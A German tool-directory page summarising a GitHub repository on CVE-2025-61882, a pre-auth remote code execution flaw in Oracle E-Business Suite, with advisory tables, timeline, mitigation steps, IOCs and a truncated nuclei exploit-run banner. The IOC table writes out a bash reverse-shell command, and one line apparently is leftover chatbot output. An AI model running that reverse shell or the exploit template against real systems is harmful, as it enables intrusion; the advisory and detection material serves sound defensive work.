Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2025-61882 — Bietet ein detailliertes CVE-2025-61882-Advisory mit technischer Analyse, IOCs, Erkennungsabfragen und einer nuclei-basierten Exploit-Vorlage für die Pre-Auth-RCE in Oracle E-Business Suite. | Kitploit
Tools/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsBedrohungsanalyseIncident Response
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Bietet ein detailliertes CVE-2025-61882-Advisory mit technischer Analyse, IOCs, Erkennungsabfragen und einer nuclei-basierten Exploit-Vorlage für die Pre-Auth-RCE in Oracle E-Business Suite.

Repository anzeigen
215vor 0 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️🚨 CVE‑2025‑61882 — Kritische Pre‑Auth Remote Code Execution in Oracle E‑Business Suite (EBS) 🚨🛡️

Kurzzusammenfassung: Kritische Pre‑Auth Remote Code Execution in Oracle E‑Business Suite (EBS) — betrifft 12.2.3 → 12.2.14, CVSS 9.8, aktiv in freier Wildbahn ausgenutzt (Ransom-/Erpressungsaktivitäten gemeldet). ([oracle.com][1])


📌 Kurzfakten (Tabelle)

FeldDetails
🆔 CVECVE‑2025‑61882
🧾 Produkt / KomponenteOracle E‑Business Suite (EBS) — Concurrent Processing / BI Publisher Integration
📦 Betroffene Versionen12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ TypRemote Code Execution (RCE) — keine Authentifizierung erforderlich
🔥 In freier Wildbahn ausgenutztJa — Massenausnutzung / Erpressungskampagnen gemeldet
📅 Offenlegung / ZeitplanOktober 2025 (Herstellerhinweis + öffentliche Writeups). ([oracle.com][1])

(Oben konsolidiert aus Herstellerhinweis, NVD/CISA und mehreren Herstelleranalysen.) ([oracle.com][1])


💥 Auswirkungen (Tabelle)

AuswirkungsbereichWas es bedeutet
🔓 VertraulichkeitAngreifer können sensible HR-/Finanz-/ERP-Daten lesen
🛠️ IntegritätAngreifer können Datensätze ändern, Backdoors erstellen oder Konfigurationen verändern
⚡ VerfügbarkeitAngreifer können Dienste stören, Ransomware ausführen oder Backups zerstören
🧭 RisikostufeExtrem — Pre‑Auth RCE auf kritischem ERP-System → mögliche vollständige Domain-Übernahme

Referenzen, die hochriskante Ausnutzung und Ransomware-Verbindungen melden. ([Rapid7][2])


🛠️ Technische Zusammenfassung (prägnant)

  • Vektor: HTTP/HTTPS-Anfragen an exponierte EBS-Web-Endpunkte lösen eine Schwachstellenkette in der Concurrent Processing / BI Publisher Integration aus, die zu Remote Code Execution führt. ([oracle.com][1])
  • Komplexität: Niedrig (keine Authentifizierung, keine Benutzerinteraktion). ([nvd.nist.gov][3])
  • Beobachtete Payloads: Reverse-Shell-Muster, Web-Shells, abgelegte Skripte für Datenerfassung und Erpressung. ([Rapid7][2])

🕵️‍♀️ Indicators of Compromise (IOCs) — Beispiele (Tabelle)

Oracle und Incident-Responder haben IOCs veröffentlicht; unten sind repräsentative Beispiele aus Hinweisen und Hersteller-Writeups. Suchen Sie in Logs und Endpunkten nach diesen Mustern. ([oracle.com][1])

TypBeispiel
🌐 IPs (beobachtet)200.107.207.26, 185.181.60.11 (beispielhafte gemeldete Adressen)
🧾 Befehlsmustersh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (Reverse Shell)
🗂️ Datei-HashesMehrere SHA‑256-Hashes für vermutete Exploit-Skripte (vollständige Liste im Herstellerhinweis)
🕳️ ArtefakteUnerwartete Web-Shells, neue Cronjobs, verdächtige ausgehende Verbindungen zu ungewöhnlichen IPs/Ports

Wenn Sie die vollständige IOC-Liste (IPs, vollständige Hashes, Dateinamen) möchten, kann ich sie hier einfügen — sagen Sie „IOCs einfügen“. (Keine Links.)


🧭 Zeitplan (kompakt)

DatumEreignis
9. Aug. 2025Früheste gemeldete reale Ausnutzungsaktivität (Hersteller-Telemetrie). ([crowdstrike.com][4])
Anfang Okt. 2025Oracle hat Sicherheitshinweis / Patch-Verfügbarkeit für EBS herausgegeben. ([oracle.com][1])
6.–7. Okt. 2025CISA hat die CVE in ihren Katalog bekannter ausgenutzter Schwachstellen (KEV) aufgenommen (Leitfaden für Bundesbehörden, Frist für Maßnahmen). ([cisa.gov][5])
Okt. 2025 (laufend)Mehrere Hersteller-Writeups und Massenexploit-Berichte (CrowdStrike, Rapid7, Tenable usw.). ([crowdstrike.com][4])

✅ Sofort empfohlene Maßnahmen (Schritt-Tabelle)

PrioritätAktionHinweise / Beispiel-Details
1️⃣ KritischPatchen betroffener EBS-InstanzenOracle-Sicherheitshinweis-Patches für Versionen 12.2.3–12.2.14 sofort anwenden. ([oracle.com][1])
2️⃣ HochIsolieren / Einschränken des Zugriffs auf EBS-Web-EndpunkteInternetzugängliches HTTP/HTTPS zu EBS blockieren; nur vertrauenswürdige Admin-IPs oder VPN zulassen.
3️⃣ HochWAF-Regeln aktivieren/anpassenHersteller-/Community-WAF-Signaturen für die Exploit-Muster bereitstellen; verdächtige Payloads blockieren. ([Rapid7][2])
4️⃣ HochJagen & erkennenLogs nach Reverse-Shell-Befehlen, abnormalen Dateischreibvorgängen und ausgehenden Verbindungen zu IOCs durchsuchen.
5️⃣ VorfallEindämmen & reagieren, wenn Kompromittierung gefundenHost isolieren, forensische Beweise sichern, Zugangsdaten ändern, aus sauberen Backups neu aufbauen.
6️⃣ RichtlinieMelden & benachrichtigenWenn regulatorische/vertragliche Anforderungen gelten, Interessengruppen und Behörden gemäß Richtlinie benachrichtigen (CISA/KEV-Leitfaden kann gelten). ([nvd.nist.gov][3])

💀 Exploits :

┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io
Tool herunterladen